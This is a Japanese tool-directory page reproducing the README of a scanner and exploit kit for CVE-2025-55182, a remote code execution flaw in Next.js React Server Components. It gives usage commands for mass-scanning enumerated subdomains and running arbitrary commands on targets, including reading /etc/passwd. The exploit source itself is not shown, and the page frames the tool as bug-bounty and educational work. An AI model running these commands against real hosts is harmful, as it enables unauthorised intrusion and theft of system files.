Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182-Simple-Scanner-main — 多言語スキャナー:Next.js React Server ComponentsにおけるCVE-2025-55182 RCEのための、単一/大量スキャンモードと統合バグバウンティ偵察ワークフローを備えたツール。 | Kitploit
ツール/GitHubGitHub/jan0x190/cve-2025-55182-simple-scanner-main
偵察脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテストサブドメイン列挙学習と教育
GitHubjan0x190/cve-2025-55182-simple-scanner-main

CVE-2025-55182-Simple-Scanner-main

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

多言語スキャナー:Next.js React Server ComponentsにおけるCVE-2025-55182 RCEのための、単一/大量スキャンモードと統合バグバウンティ偵察ワークフローを備えたツール。

リポジトリを見る
149ヶ月前未レビュー

CVE-2025-55182: React Server Components RCE スキャナー

Next.jsアプリケーション(React Server Components使用)における深刻なリモートコード実行(RCE)の脆弱性 CVE-2025-55182 を検出・悪用するための包括的ツールキットです。

このリポジトリには、統合Bashスキャナー(シングルモード&マスモード)、Python/Go実装、およびバグ報奨金偵察ワークフローが含まれています。

Scanner Menu Scanner Demo


📂 リポジトリ構成

  • scanner.sh — シングルターゲットおよびマススキャン用のオールインワンBashスクリプト
  • python/exploit.py — 安定したPython実装(JSONエスケープが良好)
  • go/main.go — 高性能実装(コンパイル可能)

🚀 偵察ワークフロー(バグ報奨金手法)

ワイルドカードドメインを大量に調査する場合は、以下のパイプラインでターゲットを絞り込んでからスキャンしてください:

root@kitploit:~
# 1. サブドメインの列挙
subfinder -dL wildcards.txt -all -recursive > subs.txt

# 2. ライブホストのフィルタリング
httpx -l subs.txt -o live.txt

# 3. Nucleiによる事前スキャン検出(オプション)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt

🛠️ Bashスキャナーの使用方法(推奨)

scanner.sh スクリプトは、シングルターゲットスキャン および ファイルリストからのマススキャン をサポートします。

🔧 インストール

root@kitploit:~
chmod +x scanner.sh

1️⃣ シングルターゲットモード

特定のターゲットを冗長出力で確認するのに最適です。

root@kitploit:~
# 基本チェック(デフォルトは "id")
./scanner.sh -d example.com

# カスタムコマンドの実行
./scanner.sh -d https://target.com -c "cat /etc/passwd"

2️⃣ マススキャンモード

URLリストを効率的にスキャンし、脆弱なホストをファイルに保存します。

root@kitploit:~
# URLリストをスキャン
./scanner.sh -l live.txt -c "whoami"

# カスタム出力ファイル
./scanner.sh -l live.txt -o my_bounty.txt

オプション


🐍 Python版

Bashでの特殊文字エスケープに問題がある場合はこちらを使用してください。

必要条件

root@kitploit:~
pip install requests

使用方法

root@kitploit:~
python3 python/exploit.py -u http://target.com -c "uname -a"

🐹 Go版

高性能、最小限の依存関係。

直接実行

root@kitploit:~
go run go/main.go -u http://target.com -c "id"

バイナリのビルド

root@kitploit:~
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com

⚠️ 免責事項

このツールは教育目的および承認されたセキュリティテストのみを目的としています。 無許可での使用は固く禁じられています。 開発者は、このプログラムの誤用または損害について一切の責任を負いません。


🔗 参考文献

  • NVD CVEの詳細: https://nvd.nist.gov/vuln/detail/CVE-2025-55182

  • React セキュリティアドバイザリ(React Server Componentsの脆弱性): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

  • ProjectDiscovery Nucleiテンプレート: https://cloud.projectdiscovery.io/library/CVE-2025-55182

ツールをダウンロード
フラグ説明
-d, --domainシングルターゲットURL
-l, --listURLリストを含むファイル
-c, --command実行するコマンド(デフォルト: id)
-o, --output脆弱ホストの出力ファイル(デフォルト: vulnerable_hosts.txt)